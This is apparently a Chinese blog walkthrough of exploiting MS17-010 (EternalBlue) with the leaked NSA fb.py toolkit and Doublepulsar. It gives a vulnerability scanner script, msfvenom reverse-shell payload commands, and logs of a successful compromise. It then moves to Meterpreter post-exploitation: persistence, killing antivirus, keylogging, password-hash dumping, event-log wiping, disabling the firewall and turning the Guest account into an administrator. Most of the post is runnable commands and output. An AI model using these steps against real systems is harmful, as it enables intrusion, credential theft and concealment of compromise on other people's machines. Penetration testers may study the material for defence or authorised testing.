一次SMB远程溢出漏洞经历（MS17-010 EternalBlue ）

2018-07-12

0x0、环境准备

下载kali linux的vmware版本：下载地址
我这里下载的是：Kali Linux 64 bit VMware VM版本
此kali Linux主要是运行Metasploit，用来生成payload的dll及反弹shell，ip为172.16.17.65。
win7 x64的机器安装python2.6.6（32位），pywin32、NSA泄露工具中的fb.py

pywin32安装的时候如果找不到Python2.6，那就使用python2.6执行下下面的代码：

#   
# script to register Python 2.0 or later for use with win32all   
# and other extensions that require Python registry settings   
#   
# written by Joakim Loew for Secret Labs AB / PythonWare   
#   
# source:   
# http://www.pythonware.com/products/works/articles/regpy20.htm   
#   
# modified by Valentine Gogichashvili as described in http://www.mail-archive.com/distutils-sig@python.org/msg10512.html   
   
import sys  
   
from _winreg import *  
   
# tweak as necessary   
version = sys.version[:3]  
installpath = sys.prefix  
   
regpath = "SOFTWARE\\Python\\Pythoncore\\%s\\" % (version)  
installkey = "InstallPath"  
pythonkey = "PythonPath"  
pythonpath = "%s;%s\\Lib\\;%s\\DLLs\\" % (  
    installpath, installpath, installpath  
)  
   
def RegisterPy():  
    try:  
        reg = OpenKey(HKEY_CURRENT_USER, regpath)  
    except EnvironmentError as e:  
        try:  
            reg = CreateKey(HKEY_CURRENT_USER, regpath)  
            SetValue(reg, installkey, REG_SZ, installpath)  
            SetValue(reg, pythonkey, REG_SZ, pythonpath)  
            CloseKey(reg)  
        except:  
            print "*** Unable to register!"  
            return  
        print "--- Python", version, "is now registered!"  
        return  
    if (QueryValue(reg, installkey) == installpath and  
        QueryValue(reg, pythonkey) == pythonpath):  
        CloseKey(reg)  
        print "=== Python", version, "is already registered!"  
        return  
    CloseKey(reg)  
    print "*** Unable to register!"  
    print "*** You probably have another Python installation!"  
   
if __name__ == "__main__":  
    RegisterPy()

0x1、检查漏洞的存在

假设存在漏洞的ip是：172.16.22.135
方法一：使用kali的Metasploit进行检测：

1 2	# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb # wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb

下载好检测脚本后，打开metasploit：

root@kali:~# msfconsole

msf >  use auxiliary/scanner/smb/smb_ms_17_010
msf auxiliary(smb_ms_17_010) > show options
msf auxiliary(smb_ms_17_010) > set rhosts 172.16.22.135
msf auxiliary(smb_ms_17_010) > run

当见到Host is likely VULNERABLE to MS17-010!等字段时候，则该漏洞存在。

方法二：使用Python检测脚本：
只需修改里面的ip，然后执行即可。

#!/usr/bin/python
# coding: utf-8

import binascii
import socket
import struct
import sys
import threading


# Packets
negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
ip = "172.16.22.135"  #改成要检测漏洞的ip
num_threads = 10
timeout = 10
filename = ""
print_lock = threading.Lock()

if len(sys.argv) == 5:
    ip = sys.argv[1]
    filename = sys.argv[2]
    timeout = sys.argv[3]
    num_threads = sys.argv[4]
    semaphore = threading.BoundedSemaphore(value=num_threads)
else:
    print "[!] args: check_ip ip_files check_timeout check_threads"

def print_status(ip, message):
    global print_lock

    with print_lock:
        print "[*] [%s] %s" % (ip, message)


def check_ip(ip):
    global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose

    # Connect to socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(float(timeout) if timeout else None)
    host = ip
    port = 445
    s.connect((host, port))

    # Send/receive negotiate protocol request
    
    print_status(ip, "Sending negotation protocol request")
    s.send(negotiate_protocol_request)
    s.recv(1024)

    # Send/receive session setup request
    print_status(ip, "Sending session setup request")
    s.send(session_setup_request)
    session_setup_response = s.recv(1024)

    # Extract user ID from session setup response
    user_id = session_setup_response[32:34]
    print_status(ip, "User ID = %s" % struct.unpack("<H", user_id)[0])

    # Replace user ID in tree connect request packet
    modified_tree_connect_request = list(tree_connect_request)
    modified_tree_connect_request[32] = user_id[0]
    modified_tree_connect_request[33] = user_id[1]
    modified_tree_connect_request = "".join(modified_tree_connect_request)

    # Send tree connect request
    print_status(ip, "Sending tree connect")
    s.send(modified_tree_connect_request)
    tree_connect_response = s.recv(1024)

    # Extract tree ID from response
    tree_id = tree_connect_response[28:30]
    print_status(ip, "Tree ID = %s" % struct.unpack("<H", tree_id)[0])

    # Replace tree ID and user ID in trans2 session setup packet
    modified_trans2_session_setup = list(trans2_session_setup)
    modified_trans2_session_setup[28] = tree_id[0]
    modified_trans2_session_setup[29] = tree_id[1]
    modified_trans2_session_setup[32] = user_id[0]
    modified_trans2_session_setup[33] = user_id[1]
    modified_trans2_session_setup = "".join(modified_trans2_session_setup)

    # Send trans2 sessions setup request
    print_status(ip, "Sending trans2 session setup")
    s.send(modified_trans2_session_setup)
    final_response = s.recv(1024)

    s.close()

    # Check for 0x51 response to indicate DOUBLEPULSAR infection
    if final_response[34] == "\x51":
        with print_lock:
            print "[+] [%s] DOUBLEPULSAR DETECTED!!!" % ip
    else:
        with print_lock:
            print "[-] [%s] No presence of DOUBLEPULSAR" % ip


def threaded_check(ip_address):
    global semaphore

    try:
        check_ip(ip_address)
    except Exception as e:
        with print_lock:
            print "[ERROR] [%s] - %s" % (ip_address, e)
    finally:
        semaphore.release()


if ip != "":
    check_ip(ip)

if filename != "":
    with open(filename, "r") as fp:
        for line in fp:
            semaphore.acquire()
            ip_address = line.strip()
            t = threading.Thread(target=threaded_check, args=(ip_address,))
            t.start()

若结果出现DOUBLEPULSAR DETECTED!!!字段，即存在漏洞！
若出现No presence of DOUBLEPULSAR字段，即不存在漏洞！

0x3、实施攻击

打开kali，生成x64的dll：msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.65 LPORT=8089 -f dll> RT64.dll

若主机是32位，使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.17.65 LPORT=8089 -f dll > rt32.dll
然后把生成的dll文件放到win7主机的C盘根目录。

同时在kali运行metasploite开启handler监听：

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) >  set lhost 172.16.17.65
lhost => 172.16.17.65
msf exploit(multi/handler) > set lport 8089
lport => 8089
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.17.65:8089

在win7上运行fb.py，运行前需要在shadowbroker-master\windows目录下新建一个文件夹listeningposts，否则会运行出错。
在相同的目录新建smb_logs文件夹，运行程序后按照提示来填写即可，需要特别注意
Default Callback IP Address对应的是kali的ip；
Use Redirection [yes] 对应的是no。

E:\work\shadowbroker-master\windows>python26 fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => E:\work\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.22.135
[?] Default Callback IP Address [] : 172.16.17.65
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : smb_logs
[*] Checking E:\work\shadowbroker-master\windows\smb_logs for projects
Index     Project
-----     -------
0         22135
1         Create a New Project

[?] Project [0] : 1
[?] New Project Name : 172.16.22.135
[?] Set target log directory to 'E:\work\shadowbroker-master\windows\smb_logs\17
2.16.22.135\z172.16.22.135'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.22.135
[+] Set CallbackIp => 172.16.17.65

[!] Redirection OFF
[+] Set LogDir => E:\work\shadowbroker-master\windows\smb_logs\172.16.22.135\z17
2.16.22.135
[+] Set Project => 172.16.22.135

使用nmap -O扫描172.16.22.135，知道该主机是win2008 server X64

Mode [0] 可根据实际情况选用，我这里选用的是0，因为我选用fb模式的话，在后续的攻击中反弹shell失败。

先执行Eternalblue：

fb > use eternal    (按tab键)
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.22.135

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.22.135
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.22.135] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] :
[+] Run Mode: DANE


[*]  ArchOs :: Architecture/OS of REDIRECTOR

   *0) x64-Windows     x64-Windows
    1) x86-Windows     x86-Windows

[?] ArchOS [0] :
[?] Linkup TCP port (0=none)? [0] :

Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.16.22.135
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*]     Using 'E:\work\shadowbroker-master\windows\storage\dane_x64.dll' as the
output template
[*]     Using 'E:\work\shadowbroker-master\windows\specials\eteb-2.dll' to handl
e parameter marshaling
[*]     Using 'E:\work\shadowbroker-master\windows\specials\etebCore-2.x64.dll'
as the input payload
[+] DANE Package: E:\work\shadowbroker-master\windows\smb_logs\172.16.22.135\z17
2.16.22.135\Eternalblue-2.2.0.exe-2018-07-12.10.47.50.832000-Package.dll

然后再执行Doublepulsar:

fb Special (Eternalblue) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.22.135

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.16.22.135
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.22.135] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 1
[+] Set Architecture => x64

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : c:\rt64.dll
[+] Set DllPayload => c:\rt64.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call


[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.22.135] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.22.135:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.22.135
TargetPort            445
DllPayload            c:\rt64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xC16E03C
2
    SMB Connection string is: Windows Server 2008 R2 Standard 7601 Service Pack
1
    Target OS is: 2008 R2 x64
    Target SP is: 1
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

可以见到payload已经执行成功，同时在kali主机已经成功反弹shell：

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.17.65:8089
[*] Sending stage (206403 bytes) to 172.16.22.135
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (172.16.17.65:8089 -> 172.16.22.135:53319) at 2018-07-11 23:10:16 -0400

meterpreter > pwd
C:\Windows\system32

0x4、Meterpreter介绍

在进行攻击前，首先好好介绍Meterpreter这个强大的攻击模块：
在/usr/share/metasploit-framework/scripts/meterpreter里面有好多写好的脚本

root@kali:/usr/share/metasploit-framework/scripts/meterpreter# ls
arp_scanner.rb      enum_logged_on_users.rb  get_env.rb              hostsedit.rb              netenum.rb              scheduleme.rb                    sound_recorder.rb           winbf.rb
autoroute.rb        enum_powershell_env.rb   get_filezilla_creds.rb  keylogrecorder.rb         packetrecorder.rb       schelevator.rb                   srt_webdrive_priv.rb        winenum.rb
checkvm.rb          enum_putty.rb            getgui.rb               killav.rb                 panda_2007_pavsrv51.rb  schtasksabuse.rb                 uploadexec.rb               wmic.rb
credcollect.rb      enum_shares.rb           get_local_subnets.rb    metsvc.rb                 persistence.rb          scraper.rb                       virtualbox_sysenter_dos.rb
domain_list_gen.rb  enum_vmware.rb           get_pidgin_creds.rb     migrate.rb                pml_driver_config.rb    screenspy.rb                     virusscan_bypass.rb
dumplinks.rb        event_manager.rb         gettelnet.rb            multicommand.rb           powerdump.rb            screen_unlock.rb                 vnc.rb
duplicate.rb        file_collector.rb        get_valid_community.rb  multi_console_command.rb  prefetchtool.rb         search_dwld.rb                   webcam.rb
enum_chrome.rb      get_application_list.rb  getvncpw.rb             multi_meter_inject.rb     process_memdump.rb      service_manager.rb               win32-sshclient.rb
enum_firefox.rb     getcountermeasure.rb     hashdump.rb             multiscript.rb            remotewinenum.rb        service_permissions_escalate.rb  win32-sshserver.rb

下面是常见的几种利用情况：
1）获取目标机器的分区情况：

meterpreter > run post/windows/gather/forensics/enum_drives

Device Name:                    Type:   Size (bytes):
------------                    -----   -------------
<Physical Drives:>
\\.\PhysicalDrive0                   4702111234474983745
<Logical Drives:>
\\.\C:                               4702111234474983745
\\.\D:                               4702111234474983745
\\.\E:                               4702111234474983745

2）判断是否为虚拟机：

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-QELKBPR0S46 is a Virtual Machine .....
[*] WIN-QELKBPR0S46 appears to be a Physical Machine

若是虚拟机的话，很有可能是一个蜜罐系统。
3）获取系统安装程序和补丁情况：

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-QELKBPR0S46

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 2345好压                                                          v5.9
 360驱动大师                                                         2.0.0.1231
 AMD Catalyst Control Center                                     2015.1019.1617.27445
 CCC Help Chinese Traditional                                    2015.1019.1616.27445
 Catalyst Control Center InstallProxy                            2015.1019.1617.27445
 Catalyst Control Center Localization All                        2015.1019.1617.27445
 Catalyst Control Center Profiles Desktop                        2015.1019.1617.27445
 LBAI                                                            1.0.0.6
 Microsoft .NET Framework 4.5                                    4.5.50709
 Microsoft .NET Framework 4.5                                    4.5.50709
 Microsoft Office Access MUI (Chinese (Simplified)) 2007         12.0.4518.1016
 Microsoft Office Excel MUI (Chinese (Simplified)) 2007          12.0.4518.1016

4) 获取ie浏览器缓存文件：

meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 8.0.7601.17514
[*] Retrieving history.....
	File: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
[*] Retrieving cookies.....
	File: C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...

5) 获得目标主机最近进行的系统操作，访问文件和office文档操作记录：

meterpreter > run post/windows/gather/dumplinks

[*] Running module against WIN-QELKBPR0S46
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\...
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\1测试环境客户端安装流程.docx.lnk.
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\20161004.lnk.
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\20161025.lnk.
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\20161025_A2.lnk.
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\20170405.lnk.
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\20170407.lnk.

6)使meterpreter在目标主机上持久化1
将meterpreter以系统服务的形式安装在目标主机上，利用metsvc模块使得meterpreter成为了目标主机中的一个自启动的系统服务。

meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Windows\TEMP\BNakVoHK...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

7)使meterpreter在目标主机上持久化2
通过在meterpreter会话中运行persistence后渗透攻击模块，在目标主机的注册表值 HKLM\Software\Microsoft\Windows\Currentversion\Run中添加键值，达到自启动的目的，-X参数指定启动的方式为开机自启动，-i的参数指定反向连接的时间间隔。

meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI


启动过程：创建攻击载荷->攻击载荷植入到目标主机c:\windows\temp目录下，是一个.vbs的脚本->写目标主机注册表键值实现开机自动运行。

然后可以监听：
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.244.129
set LPOTR 3376
exploit

8）连接3389端口相关
开启3389远程桌面：run post/windows/manage/enable_rdp 或 run getgui -e
创建用户：run getgui -u xxxxx -p xxxxx
在开启远程桌面会话之前，我们还需要使用idletime命令检查远程用户的空闲时长：

1 2	meterpreter > idletime User has been idle for: 22 hours 12 mins 36 secs

关闭目标机器上的杀毒软件：run killav

屏幕截图：

1 2	meterpreter > screenshot Screenshot saved to: /root/oHvXkNlx.jpeg

上传/下载文件
“download”命令可以帮助我们从目标系统中下载文件，“upload”命令则能够向目标系统上传文件。

meterpreter > download /Windows/system32/drivers/etc/hosts
[*] Downloading: /Windows/system32/drivers/etc/hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): /Windows/system32/drivers/etc/hosts -> hosts
[*] download   : /Windows/system32/drivers/etc/hosts -> hosts

9) 记录按键及获得system权限
有的时候，你可能会发现自己的Meterpreter会话受到了用户权限的限制，而这将会严重影响你在目标系统中的活动。比如说，修改注册表、安装后门或导出密码等活动都需要提升用户权限，而Meterpreter给我们提供了一个“getsystem”命令，它可以使用多种技术在目标系统中实现提权：
“getuid”命令可以获取当前用户的信息，在上面的例子中，用户为“NT AUTHORITY\SYSTEM”，这个就是Windows本地系统账号。

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Meterpreter还可以在目标设备上实现键盘记录功能，键盘记录主要涉及以下三种命令：
keyscan_start：开启键盘记录功能
keyscan_dump：显示捕捉到的键盘记录信息（开启后，等候一会使用该命令）
keyscan_stop：停止键盘记录功能

但是使用键盘记录一般需要system权限和绑定进程。

例如想把Meterpreter跟winlogon.exe绑定，并在登录进程中捕获键盘记录。
首先输入ps命令查看目标设备中运行的进程
然后getuid找到当前的进程
最后使用migrate进行绑定
绑定成功后，keyscan_start开启键盘记录，可以先run post/windows/gather/enum_logged_on_users查看用户是否登录成功，然后在keyscan_dump获取键盘记录

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 224   560   svchost.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 240   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 280   560   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 380   304   csrss.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 456   448   csrss.exe         x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 464   304   wininit.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 1384   448   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 
meterpreter > getpid
Current pid: 1740
meterpreter > migrate 1384
[*] Migrating from 2148 to 1384...
[*] Migration completed successfully.

知道进程id后也可以窃取该用户进程的令牌：steal_token 2584，一般被用于盗取域管理员的token

10) 获取凭证及清除记录

meterpreter > run post/windows/gather/hashdump   （直接”run hashdump”或”run smart_hashdump”也可以，而且这两个命令更隐秘）

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 87d9bed604dd5463c9c3132ff24568d9...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:99ba2654730d17dde6d468de43618621:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


meterpreter > clearev
[*] Wiping 894 records from Application...
[*] Wiping 14479 records from System...
[*] Wiping 35193 records from Security...

1、若是想查看其他网段及跳转路由，请访问 route命令的第31点
2、若遇到防火墙，关闭防火墙可通过shell命令netsh adcfirewall set allprofiles state off执行，具体操作点击访问关闭防火墙
3、可以使用mimikatz破解hash值:
load mimikatz
msv (获取 hash 值)
ssp （获取明文信息）
wdigest （获取系统账户信息）
mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)
mimikatz_command -f hash:: (获取目标 hash)

0x5、后渗透攻击

我得到的是一台win2008 server的机器，ip为172.16.22.135。
我试了用getgui创建用户，创建失败，于是想破解hash值登录，得到Administrator:500:aad3b435b51404eeaad3b435b51404ee:99ba2654730d17dde6d468de43618621::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
可以见到Guest账户的密码其实是空的，因为NTLM-hash：31d6cfe0d16ae931b73c59d7e0c089c0为空密码
于是我输入shell，激活Guest账户：net user Guest /active:yes
然后加入管理员群组net localgroup administrators Guest /add
于是就可以使用Guest账户3389登录了，密码是空。
（当然这种做法是没有经过任何的隐藏，也很容易被发现，在外部搞的时候要慎用！）

0x6、总结

关于检测ms17-010漏洞，nmap与Metasploit可以直接检测了
nmap检测方法是:nmap -n -p445 --script=smb-vuln-*.nse --script-args=unsafe=1 172.16.22.73,具体见nmap smb
Metasploit检测模块是：exploit/windows/smb/ms17_010_eternalblue与exploit/windows/smb/ms17_010_psexec,具体见Metasploit 「永恒之蓝」两种模块的利弊

更有大神利用了metasploit复现了fb.py的Eternalblue-Doublepulsar:MSF复现Eternalblue-Doublepulsar

关于漏洞利用的对象：本人测试的中招目标中，Server 2008 R2版本的执行都成功了，而windows7系统几乎都不成功，似乎是用了国产win镜像。

总结：在以后的检测工作中，可以先使用nmap进行检测，然后再利用msf一键进行利用，这个方法应该是最简便的了。

参考链接：
NSA Eternalblue SMB 远程溢出复现
 fb.py复现和中招检查方法(勒索病毒原理)
手把手教你如何利用Meterpreter渗透Windows系统
 Metasploit工具Meterpreter的命令速查表
 mimikatz神器使用
 nmap扫描smb漏洞及Pass The Hash攻击
 Meterpreter综合提权
 Metasploit后渗透技巧
 Windows下建立隐藏管理员账号

本文链接： http://dayun.shystartree.online/2018/07/12/%E4%B8%80%E6%AC%A1SMB%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%BB%8F%E5%8E%86%EF%BC%88MS17-010%20EternalBlue%20%EF%BC%89/
版权声明：本博客所有文章除特别声明外，均采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议

许可协议。欢迎转载，但转载请注明来自qingyu’s blog，并保持转载后文章内容的完整，本人保留所有版权相关权利。